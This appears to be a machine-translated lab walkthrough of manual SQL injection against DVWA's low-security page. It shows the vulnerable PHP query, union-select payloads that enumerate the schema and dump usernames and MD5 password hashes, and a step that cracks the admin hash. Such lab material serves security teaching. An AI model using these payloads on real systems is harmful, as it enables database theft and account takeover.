sql injection
Manual injection of ideas:
-
Determine whether there is injection (character type or numeric type, etc.)
When the input parameters are integer, such as ID, age, page number, etc., if there is an injection vulnerability, it can be considered as a digital injection
Difference: the number type does not need to be closed with single quotation marks, while the string type generally needs to be closed with single quotation marks.
-
Guess the number of fields in the SQL query (order by num/union select)
-
Fixed display (determine whether there is a sequence of fields displayed)
-
Burst library
-
Burst table
-
Burst field name
-
Download
dvwa low level SQL injection
Source code:
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
-
Type in the input box
1
Type in the input box1'
Type in the input box1''
Can be judged as character injection, the parameter is ID
-
Construct payload
Guess the field:
Enter and
1' order by 1#
1' order by 2#
enter1' order by 3#
The number of available fields is 2
Explosion: (joint injection)1' union select database(),user()#
Available Kuming as dvwa
Burst table:-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
Select the users table
Field name:-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#
download: -1' union select user,password from users#
Available user name and password (MD5)
-
Select admin and its ciphertext 5f4dcc3b5aa765d61d8327deb882cf99, crack the password
Verification: Successful login
ps:http://itindex.net/detail/54715-%E8%AE%A4%E8%AF%86-sql-%E7%B1%BB%E5%9E%8B
http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html